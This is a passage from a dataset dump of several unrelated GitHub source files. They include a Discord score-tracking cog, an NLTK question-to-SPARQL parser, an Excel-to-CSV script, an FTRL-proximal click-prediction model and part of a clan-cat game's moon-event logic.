datetime.utcnow() - self.history.loc[-1][\"date\"] > self.fix_time:\r\n return await ctx.send(\r\n \"It's too late to go back now, \"\r\n \"you will have to live with that mistake forever\"\r\n )\r\n\r\n if not self.is_in_range(score):\r\n return await ctx.send(\r\n \"It's not a valid score!\"\r\n \" Range is [{}, {}], you gave {}\".format(\r\n MIN_SCORE, MAX_SCORE, score\r\n )\r\n )\r\n\r\n if self.history.loc[-1].score == score:\r\n self.remove_last()\r\n\r\n await ctx.send(\r\n \"Previous score removed! Score was: {}\".format(score)\r\n )\r\n else:\r\n await ctx.send(\r\n \"Score does not match! 
Score was: {}\".format(\r\n self.history.loc[-1].score\r\n )\r\n )\r\n\r\n @score.error\r\n @fix.error\r\n async def error_handler(self, ctx, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(\r\n \"The following argument is missing: {}\".format(error.param)\r\n )\r\n\r\n elif isinstance(error, commands.CheckFailure):\r\n await ctx.send(\"You cannot use that command!\")\r\n\r\n elif isinstance(error, commands.BadArgument):\r\n await ctx.send(\"The score need to be an integer\")\r\n\r\n else:\r\n print(\r\n \"Encountered unexpected error: {} {}\".format(error, type(error))\r\n )\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(ScoreTracker(bot))\r\n","repo_name":"T4g1/z14","sub_path":"modules/score_tracker.py","file_name":"score_tracker.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"74385996968","text":"from nltk.tokenize import word_tokenize\nimport nltk\nfrom nltk.corpus import stopwords\nimport sparql\n\nsearch = raw_input(\"Search:\")\nprocessedWords = []\nwords = nltk.word_tokenize(search)\nsTwords = stopwords.words('english')\n\n#Removing stopwords\nfor word in words:\n if word not in sTwords:\n processedWords.append(word)\n\ntagged_words = nltk.pos_tag(processedWords)\nprint('Searching...')\n\n#Case where was born\nif (tagged_words[0][1] == 'WRB' and tagged_words[0][0] == 'Where' and tagged_words[1][1] == 'VBN'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.whereWasBorn(term)\n\n#Case who\nif (tagged_words[0][1] == 'WP'):\n name = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n name += word[0]\n else:\n name += ' ' + word[0]\n \n i += 1\n sparql.whoIs(name)\n\n#Case where\nif (tagged_words[0][1] == 'WRB'):\n place = ''\n i = 0\n for word in tagged_words:\n if (word[1] != 'WRB' and word[1] != '.'):\n if (i == 0):\n place += word[0]\n else:\n place += ' ' + word[0]\n\n i += 1\n \n sparql.whereIs(place)\n\n#Case what\nif (tagged_words[0][1] == 'WP' and tagged_words[0][0] == 'What'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] != 'WP' and word[1] != '.'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.whatIs(term)\n\n# case how to cook\nif (tagged_words[0][1] == 'WRB' and tagged_words[0][0] == 'How'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.howToCook(term)\n\n","repo_name":"Cardoso222/NL2SPARQL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"}
+{"seq_id":"7722725014","text":"# python gencsvs.py \n# run from CMD with anaconda prompt\nimport pandas as pd\n#\ndef g1():\n df = pd.read_excel('covmenu.xlsx', sheet_name='Hoja1')\n #\n df.to_csv(r'covmenu1.csv', index = False, header=True)\n print(\"g1\")\n\ndef g2():\n df = pd.read_excel('covmenu.xlsx', sheet_name='Hoja2')\n #\n df.to_csv(r'covmenu2.csv', index = False, header=True) \n print(\"g1\")\n# - - - - - - - - - - - - - - - - - - - - - \n#\nprint(\"ini\")\ng1()\n# \ng2() \n#\nprint(\"fin\")","repo_name":"DENRIV/PythonFlaskCovXXI","sub_path":"gencsvs.py","file_name":"gencsvs.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8752820223","text":"from csv import reader\r\nfrom math import exp, sqrt\r\nfrom random import random\r\n\r\nfrom xxhash import xxh64\r\n\r\n\r\ndef data(path, D):\r\n ''' GENERATOR: \r\n Apply hash-trick to the original csv row\r\n and for simplicity, we one-hot-encode everything\r\n\r\n INPUT:\r\n path: path to training or testing file\r\n D: the max index that we can hash to\r\n\r\n YIELDS:\r\n x: a list of hashed and one-hot-encoded 'indices'\r\n we only need the index since all values are either 0 or 1\r\n y: y = 1 if we have a click, else we have y = 0\r\n '''\r\n \r\n with open(path, 'r', encoding='utf-8') as f:\r\n csvreader = reader(f) # create a CSV reader\r\n header = next(csvreader)\r\n for row in csvreader: # iterate over the available rows\r\n row = dict(zip(header, row))\r\n \r\n # ts and bid_id are used only while updating train data\r\n for feat in ['bid_id', 'ts']:\r\n if feat in row:\r\n del row[feat]\r\n \r\n # process clicks\r\n y = 0.\r\n target='click'\r\n if target in row:\r\n if row[target] == '1':\r\n y = 1.\r\n del row[target]\r\n \r\n # build x\r\n x = []\r\n for key in row:\r\n value = row[key]\r\n # one-hot encode everything with hash trick\r\n index = xxh64(key + '_' + value).intdigest() % D\r\n x.append(index)\r\n \r\n yield x, y\r\n\r\n\r\nclass ftrl_proximal(object):\r\n ''' Main algorithm: Follow the regularized leader - proximal\r\n\r\n In short,\r\n this is an adaptive-learning-rate sparse logistic-regression with\r\n efficient L1-L2-regularization\r\n\r\n Reference:\r\n http://www.eecs.tufts.edu/~dsculley/papers/ad-click-prediction.pdf\r\n '''\r\n\r\n def __init__(self, alpha, beta, L1, L2, D, interaction):\r\n # parameters\r\n self.alpha = alpha\r\n self.beta = beta\r\n self.L1 = L1\r\n self.L2 = L2\r\n\r\n # feature related parameters\r\n self.D = D\r\n self.interaction = interaction\r\n\r\n # model\r\n # n: squared sum of past gradients\r\n # z: weights\r\n # w: lazy weights\r\n self.n = [0.] * D\r\n self.z = [random() for k in range(D)] #[0.] * D\r\n self.w = {}\r\n\r\n def _indices(self, x):\r\n ''' A helper generator that yields the indices in x\r\n\r\n The purpose of this generator is to make the following\r\n code a bit cleaner when doing feature interaction.\r\n '''\r\n\r\n # first yield index of the bias term\r\n yield 0\r\n\r\n # then yield the normal indices\r\n for index in x:\r\n yield index\r\n\r\n # now yield interactions (if applicable)\r\n if self.interaction:\r\n D = self.D\r\n L = len(x)\r\n\r\n x = sorted(x)\r\n for i in range(L):\r\n for j in range(i+1, L):\r\n # one-hot encode interactions with hash trick\r\n yield xxh64(str(x[i]) + '_' + str(x[j])).intdigest() % D\r\n\r\n def predict(self, x):\r\n ''' Get probability estimation on x\r\n\r\n INPUT:\r\n x: features\r\n\r\n OUTPUT:\r\n probability of p(y = 1 | x; w)\r\n '''\r\n\r\n # parameters\r\n alpha = self.alpha\r\n beta = self.beta\r\n L1 = self.L1\r\n L2 = self.L2\r\n\r\n # model\r\n n = self.n\r\n z = self.z\r\n w = {}\r\n\r\n # wTx is the inner product of w and x\r\n wTx = 0.\r\n for i in self._indices(x):\r\n sign = -1. if z[i] < 0 else 1. 
# get sign of z[i]\r\n\r\n # build w on the fly using z and n, hence the name - lazy weights\r\n # we are doing this at prediction instead of update time is because\r\n # this allows us for not storing the complete w\r\n if sign * z[i] <= L1:\r\n # w[i] vanishes due to L1 regularization\r\n w[i] = 0.\r\n else:\r\n # apply prediction time L1, L2 regularization to z and get w\r\n w[i] = round((sign * L1 - z[i]) / ((beta + sqrt(n[i])) / alpha + L2), 5)\r\n\r\n wTx += w[i]\r\n\r\n # cache the current w for update stage\r\n self.w = w\r\n\r\n # bounded sigmoid function, this is the probability estimation\r\n return 1. / (1. + exp(-max(min(wTx, 35.), -35.)))\r\n\r\n def update(self, x, p, y):\r\n ''' Update model using x, p, y\r\n\r\n INPUT:\r\n x: feature, a list of indices\r\n p: click probability prediction of our model\r\n y: answer\r\n\r\n MODIFIES:\r\n self.n: increase by squared gradient\r\n self.z: weights\r\n '''\r\n\r\n # parameter\r\n alpha = self.alpha\r\n\r\n # model\r\n n = self.n\r\n z = self.z\r\n w = self.w\r\n\r\n # gradient under logloss\r\n g = p - y\r\n\r\n # update z and n\r\n for i in self._indices(x):\r\n # if there were too many gradient steps along the feature\r\n # don't do step\r\n if (abs(z[i]) > 10e15)|(n[i] > 10e30):\r\n continue\r\n else:\r\n sigma = (sqrt(n[i] + g * g) - sqrt(n[i])) / alpha\r\n z[i] += g - sigma * w[i]\r\n n[i] += g * g\r\n \r\n def fit(self, path, epoch_num):\r\n ''' Fit model on a bunch of training data\r\n\r\n INPUT:\r\n path: path to training file\r\n epoch_num: number of training epochs\r\n\r\n MODIFIES:\r\n self.n: increase by squared gradient\r\n self.z: weights\r\n '''\r\n for e in range(epoch_num):\r\n for x, y in data(path, self.D): # data is a generator\r\n p = self.predict(x)\r\n self.update(x, p, y)\r\n \r\n def test(self, path):\r\n ''' Get target values and corresponding prediction for a bunch of test data\r\n\r\n INPUT:\r\n path: path to test file\r\n\r\n OUTPUT:\r\n ys: list of target values\r\n preds: list of prediction values\r\n '''\r\n preds = []\r\n ys = []\r\n for x, y in data(path, self.D):\r\n p = self.predict(x)\r\n preds += [p]\r\n ys += [y]\r\n return ys, preds\r\n \r\n def output_weigts(self):\r\n ''' Build the complete weight vector (for following saving)\r\n\r\n OUTPUT:\r\n w: weight vector for logistic regression\r\n '''\r\n alpha = self.alpha\r\n beta = self.beta\r\n L1 = self.L1\r\n L2 = self.L2\r\n \r\n # model\r\n n = self.n\r\n z = self.z\r\n w = {}\r\n for i in range(len(z)):\r\n sign = -1. if z[i] < 0 else 1. # get sign of z[i]\r\n \r\n # build the complete w\r\n if sign * z[i] <= L1:\r\n # w[i] vanishes due to L1 regularization\r\n w[i] = 0.\r\n else:\r\n # apply prediction time L1, L2 regularization to z and get w\r\n w[i] = round((sign * L1 - z[i]) / ((beta + sqrt(n[i])) / alpha + L2), 5)\r\n \r\n return w\r\n \r\n","repo_name":"mkhasykov/for_rtb_pricing_function","sub_path":"xxftrl.py","file_name":"xxftrl.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18908662368","text":"from .cats import *\nfrom .buttons import *\nfrom .relation_events import * \n\nclass Events(object):\n all_events = {}\n\n def __init__(self, e_type=None, **cats):\n self.e_type = e_type\n self.ID = str(randint(0, 9)) + str(randint(0, 9)) + str(randint(\n 0, 9)) + str(randint(0, 9))\n if e_type is not None:\n self.all_events[self.ID] = self\n self.cats = cats\n self.at_war = False\n self.time_at_war = False\n self.enemy_clan = None\n self.living_cats = 0\n self.new_cat_invited = False\n self.ceremony_accessory = False\n game.switches['pregnancy'] = False\n game.switches['birth_cooldown'] = False\n if game.switches['birth_cooldown']:\n birth_range = randint(6, 9)\n\n def one_moon(self):\n if game.switches['timeskip']:\n game.switches['saved_clan'] = False\n self.living_cats = 0\n self.new_cat_invited = False\n game.patrolled.clear()\n for cat in cat_class.all_cats.copy().values():\n if not cat.dead and not cat.exiled:\n self._extracted_from_one_moon_7(cat)\n elif cat.exiled:\n cat.moons += 1\n if cat.moons == 6:\n cat.age = 'adolescent'\n elif cat.moons == 12:\n cat.age = 'adult'\n elif cat.moons == 100:\n cat.age = 'elder'\n if cat.moons > randint(100, 200):\n if choice([1, 2, 3, 4, 5]) == 1 and cat.dead == False:\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n if cat.exiled and cat.status == 'leader' and cat.dead == False and randint(\n 1, 10) == 1:\n game.clan.leader_lives -= 1\n if game.clan.leader_lives <= 0:\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n game.clan.leader_lives = 0\n elif cat.exiled and cat.status == 'leader' and cat.dead == False and randint(\n 1, 45) == 1:\n game.clan.leader_lives -= 10\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n game.clan.leader_lives = 0\n else:\n cat.dead_for += 1\n\n # interaction here so every cat may have got a new name\n relation_events = Relation_Events()\n cat_list = list(cat_class.all_cats.copy().values())\n random.shuffle(cat_list)\n for cat in cat_list:\n if not cat.dead and not cat.exiled:\n relation_events.create_interaction(cat)\n relation_events.handle_relationships(cat)\n relation_events.check_if_having_kits(cat)\n #relation_events.have_kits(cat)\n cat_class.thoughts()\n self.check_clan_relations()\n game.clan.age += 1\n if game.settings.get(\n 'autosave') is True and game.clan.age % 5 == 0:\n cat_class.json_save_cats()\n game.clan.save_clan()\n game.clan.current_season = game.clan.seasons[game.clan.age % 12]\n game.event_scroll_ct = 0\n has_med = any(\n str(cat.status) in {\"medicine cat\", \"medicine cat apprentice\"}\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n\n if not has_med:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no medicine cat!\")\n if game.clan.deputy == 0 or game.clan.deputy is None or game.clan.deputy.dead or game.clan.deputy.exiled:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no deputy!\")\n if game.clan.leader.dead or game.clan.leader.exiled:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no leader!\")\n if game.switches['birth_cooldown']:\n birth_range -= 1\n\n game.switches['timeskip'] = False\n\n # TODO Rename this here and in `one_moon`\n def _extracted_from_one_moon_7(self, cat):\n self.living_cats += 1\n cat.in_camp = 1\n 
self.check_age(cat)\n self.perform_ceremonies(cat)\n if self.new_cat_invited == False or self.living_cats < 10:\n self.invite_new_cats(cat)\n self.other_interactions(cat)\n self.gain_accessories(cat)\n self.gain_scars(cat)\n self.handle_deaths(cat)\n\n def check_clan_relations(self):\n if len(game.clan.all_clans) > 0 and randint(1, 5) == 1:\n war_notice = ''\n for other_clan in game.clan.all_clans:\n if int(other_clan.relations) <= 5:\n if randint(1, 5) == 1 and self.time_at_war > 2:\n self.at_war = False\n self.time_at_war = 0\n other_clan.relations = 10\n game.cur_events_list.append('The war against ' +\n str(other_clan.name) +\n 'Clan has ended')\n elif self.time_at_war == 0:\n game.cur_events_list.append('The war against ' +\n str(other_clan.name) +\n 'Clan has begun')\n self.time_at_war += 1\n else:\n self.enemy_clan = f'{str(other_clan.name)}Clan'\n possible_text = [\n f'War rages between {game.clan.name}Clan and {other_clan.name}Clan',\n f'{other_clan.name}Clan has taken some of {game.clan.name}'\n + \"Clan\\'s territory\",\n f'{game.clan.name}Clan has claimed some of {other_clan.name}'\n + \"Clan\\'s territory\",\n f'{other_clan.name}Clan attempted to break into your camp during the war',\n f'The war against {other_clan.name}Clan continues',\n f'{game.clan.name}Clan is starting to get tired of the war against {other_clan.name}Clan',\n f'{game.clan.name}Clan warriors plan new battle strategies for the war',\n f'{game.clan.name}Clan warriors reinforce the camp walls'\n ]\n if game.clan.medicine_cat is not None:\n possible_text.extend([\n 'The medicine cats worry about having enough herbs to treat their clan\\'s wounds'\n ])\n war_notice = choice(possible_text)\n self.time_at_war += 1\n break\n elif int(other_clan.relations) > 30:\n other_clan.relations = 10\n else:\n self.at_war = False\n if war_notice:\n game.cur_events_list.append(war_notice)\n\n def perform_ceremonies(self, cat):\n if (game.clan.leader.dead or game.clan.leader.exiled\n ) and game.clan.deputy is not None and not game.clan.deputy.dead:\n if game.clan.leader.exiled:\n game.cur_events_list.append(\n str(game.clan.leader.name) + ' was exiled')\n else:\n game.cur_events_list.append(\n str(game.clan.leader.name) +\n ' has lost their last life and has travelled to StarClan')\n game.clan.new_leader(game.clan.deputy)\n game.clan.leader_lives = 9\n game.cur_events_list.append(\n f'{str(game.clan.deputy.name)} has been promoted to the new leader of the clan'\n )\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n game.clan.deputy = None\n if not cat.dead:\n cat.moons += 1\n if cat.status == 'deputy' and game.clan.deputy is None:\n game.clan.deputy = cat\n if cat.moons > cat_class.age_moons[cat.age][1]:\n if cat.age != 'elder':\n cat.age = cat_class.ages[cat_class.ages.index(cat.age) + 1]\n if cat.status == 'kitten' and cat.age == 'adolescent':\n cat.status_change('apprentice')\n game.cur_events_list.append(\n f'{str(cat.name)} has started their apprenticeship')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n cat.update_mentor()\n elif cat.status == 'apprentice' and cat.age == 'young adult':\n self._extracted_from_perform_ceremonies_19(\n cat, 'warrior', ' has earned their warrior name')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n elif cat.status == 'medicine cat apprentice' and cat.age == 'young adult':\n self._extracted_from_perform_ceremonies_19(\n cat, 'medicine cat',\n ' has earned their medicine cat name')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n 
game.clan.new_medicine_cat(cat)\n elif cat.status == 'deputy' and cat.age == 'elder' and len(\n cat.apprentice) < 1:\n cat.status_change('elder')\n game.clan.deputy = None\n game.cur_events_list.append(\n f'The deputy {str(cat.name)} has retired to the elder den'\n )\n elif cat.status == 'warrior' and cat.age == 'elder' and len(\n cat.apprentice) < 1:\n cat.status_change('elder')\n game.cur_events_list.append(\n f'{str(cat.name)} has retired to the elder den')\n if cat.status in [\n 'warrior', 'deputy'\n ] and cat.age == 'elder' and len(cat.apprentice) < 1:\n cat.status_change('elder')\n if str(cat.status) == 'deputy':\n game.clan.deputy = None\n game.cur_events_list.append(\n f'{str(cat.name)} has retired to the elder den')\n\n # TODO Rename this here and in `perform_ceremonies`\n def _extracted_from_perform_ceremonies_19(self, cat, arg1, arg2):\n cat.status_change(arg1)\n cat.update_mentor()\n game.cur_events_list.append(f'{str(cat.name)}{arg2}')\n\n def gain_accessories(self, cat):\n if cat.accessory is not None:\n return\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n acc_text = []\n chance = randint(0, 50)\n if cat.age in ['kitten', 'adolescent']:\n chance = randint(0, 70)\n elif cat.age in ['young adult', 'adult', 'senior adult', 'elder']:\n chance = randint(0, 150)\n elif cat.trait in ['childish', 'lonesome', 'loving', 'playful', 'shameless', 'strange', 'troublesome']:\n chance = randint(0, 40)\n elif cat.status in ['medicine cat', 'medicine cat apprentice']:\n chance = randint(0, 30)\n if chance == 1:\n if cat.accessory is None:\n cat.accessory = choice([\n choice(plant_accessories),\n choice(wild_accessories)\n ])\n accessory = cat.accessory\n #if self.ceremony_accessory == True:\n # acc_text.extend([f'{other_name} gives {name} something to adorn their pelt as congratulations', f'{name} decides to pick something to adorn their pelt as celebration'])\n if cat.age != 'kitten':\n if cat.accessory in [\"FORGET ME NOTS\", \"BLUEBELLS\", \"POPPY\"]:\n if game.clan.current_season == 'Leaf-bare':\n acc_text.append(f'{name} found a mysterious flower growing in the {choice([\"snow\", \"ice\", \"frost\"])} and decided to wear it')\n else:\n acc_text.extend([f'{name} received a flower from {other_name} and decided to wear it on their pelt',\n f'{name} found a pretty flower and decided to wear it on their pelt', f'A clanmate gave {name} a flower and they decided to wear it'\n ])\n elif cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"] and cat.specialty != \"NOTAIL\" and cat.specialty2 != \"NOTAIL\":\n acc_text.append(f'{name} found a bunch of pretty feathers and decided to wear them')\n elif cat.accessory in [\"HERBS\", \"PETALS\", \"DRY_HERBS\"]:\n acc_text.append(f'{name} always seems to have something stuck in their fur')\n elif cat.accessory in plant_accessories and cat.status in ['medicine cat apprentice', 'medicine cat']:\n acc_text.extend([f'{name} has decided to always bring their {accessory.lower()} with them',\n f'{accessory.lower()} - an item so important to {name} that they always carry it around'.capitalize,\n f'{accessory.lower()} - so vital for {name} that they always have it on them'.capitalize\n ])\n else:\n acc_text.extend([f'{name} finds something interesting and decides to 
wear it on their pelt', f'A clanmate gives {name} a pretty accessory and they decide to wear it on their pelt',\n f'{name} finds something interesting while out on a walk and decides to wear it on their pelt', f'{name} finds {accessory.lower()} fascinating and decides to wear it on their pelt',\n f'A clanmate gives {name} something to adorn their pelt as a gift', f'{other_name} gives {name} a pretty accessory and they decide to wear it on their pelt'\n ])\n else:\n if cat.accessory in [\"FORGET ME NOTS\", \"BLUEBELLS\", \"POPPY\"]:\n acc_text.extend([f'{name} received a flower from {other_name} and decided to wear it on their pelt',\n f'{name} found a pretty flower and decided to wear it on their pelt', f'A clanmate gave {name} a flower and they decided to wear it'\n ])\n elif cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"] and cat.specialty != \"NOTAIL\" and cat.specialty2 != \"NOTAIL\":\n acc_text.append(f'{name} was playing with feathers earlier and decided to wear some of them')\n elif cat.accessory in [\"HERBS\", \"PETALS\", \"DRYHERBS\"]:\n acc_text.append(f'{name}\\'s parents try their best to groom them, but something is always stuck in their fur')\n else: \n acc_text.extend([f'{name} seems to have picked something up while playing out in the camp', f'{name} finds something interesting and decides to wear it on their pelt',\n f'A clanmate gives {name} a pretty accessory and they decide to wear it on their pelt', f'{other_name} gives {name} a pretty accessory and they decide to wear it on their pelt',\n f'{name} is so cute that they are given {accessory.lower()} as a gift', f'{name} starts to wear {accessory.lower()} on their pelt after their friend gave it to them',\n f'{name} was playing with {accessory.lower()} earlier and has decided to use it to adorn themselves'\n ])\n if acc_text:\n game.cur_events_list.append(choice(acc_text))\n if self.ceremony_accessory:\n self.ceremony_accessory = False \n\n def gain_scars(self, cat):\n if cat.specialty is not None and cat.specialty2 is not None or cat.age == 'kitten':\n return\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n scar_chance = randint(0, 40)\n clancats = int(self.living_cats)\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n scar_text = []\n clan_has_kits = any(\n str(cat.status) in \"kitten\"\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n if clancats > 45:\n scar_chance = scar_chance + 20\n elif clancats > 120:\n scar_chance = scar_chance * 2\n elif clancats > 300:\n scar_chance = scar_chance + 80\n else:\n scar_chance = scar_chance\n if cat.age in ['adolescent', 'young adult']:\n chance = scar_chance\n elif cat.age in ['adult', 'senior adult']:\n chance = scar_chance + 10\n elif cat.age in [\n 'apprentice', 'medicine cat apprentice'\n ] and cat.mentor.ID == other_cat.ID and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n chance = scar_chance - 15\n elif other_cat.status in ['leader', 'deputy'] and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n chance = scar_chance\n else:\n chance = scar_chance\n if chance == 1:\n if 
cat.specialty is None:\n cat.specialty = choice([\n choice(scars1),\n choice(scars2),\n choice(scars4),\n choice(scars5)\n ])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]))\n elif cat.specialty == 'SNAKE':\n scar_text.append(f'{name} was bit by a snake but lived')\n elif cat.specialty == 'TOETRAP':\n scar_text.append(\n f'{name} got their paw stuck in a twoleg trap and earned a scar'\n )\n else:\n scar_text.extend([\n f'{name} earned a scar fighting a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]), f'{name} earned a scar defending the territory',\n f'{name} earned a scar protecting the kits',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after accidentally wandering over the border',\n f'{name} is injured after messing with a twoleg object'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([\n choice(scars1),\n choice(scars2),\n choice(scars4),\n choice(scars5)\n ])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]))\n elif cat.specialty2 == 'SNAKE' and cat.specialty != 'SNAKE':\n scar_text.append(f'{name} was bit by a snake but lived')\n elif cat.specialty2 == 'TOETRAP' and cat.specialty != 'TOETRAP':\n scar_text.append(\n f'{name} got their paw stuck in a twoleg trap and earned a scar'\n )\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar fighting a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]), f'{name} earned a scar defending the territory',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after accidentally wandering over the border',\n f'{name} is injured after messing with a twoleg object',\n f'{name} is injured after a fight broke out with ' +\n other_name\n ])\n\n elif chance == 1 and cat.status in [\n 'apprentice', 'medicine cat apprentice'\n ] and cat.mentor.ID == other_cat.ID and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(\n f'{name} recklessly lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' encouraged by their mentor')\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar recklessly fighting a ' +\n choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]) + ' encouraged by their mentor',\n f'{name} earned a scar for not defending the territory well enough',\n f'{name} is 
injured after being pushed into a river',\n f'{name} is punished by their mentor after accidentally wandering over the border',\n f'{name} is injured by their mentor after being caught messing with a twoleg object'\n f'{name} is injured by their mentor while practicing with their claws out',\n f'{name}\\'s mentor punished them for disobeying',\n f'{name} gained a scar while fighting their mentor',\n f'{name} is injured while practicing their battle moves with '\n + other_name,\n f'{name} is injured after a fight broke out with ' +\n other_name,\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result',\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' encouraged by their mentor')\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar recklessly fighting a ' +\n choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]) + ' encouraged by their mentor',\n f'{name} earned a scar for not defending the territory well enough',\n f'{name} is injured after being pushed into a river',\n f'{name} is punished by their mentor after accidentally wandering over the border',\n f'{name} is injured by their mentor after being caught messing with a twoleg object'\n f'{name} is injured by their mentor while practicing with their claws out',\n f'{name}\\'s mentor punished them for disobeying',\n f'{name} gained a scar while fighting their mentor',\n f'{name} is injured while practicing their batle moves with '\n + other_name,\n f'{name} is injured after a fight broke out with ' +\n other_name,\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result'\n ])\n\n elif chance == 1 and cat.status in [\n 'warrior', 'deputy', 'medicine cat'\n ] and other_cat.status == 'leader':\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered 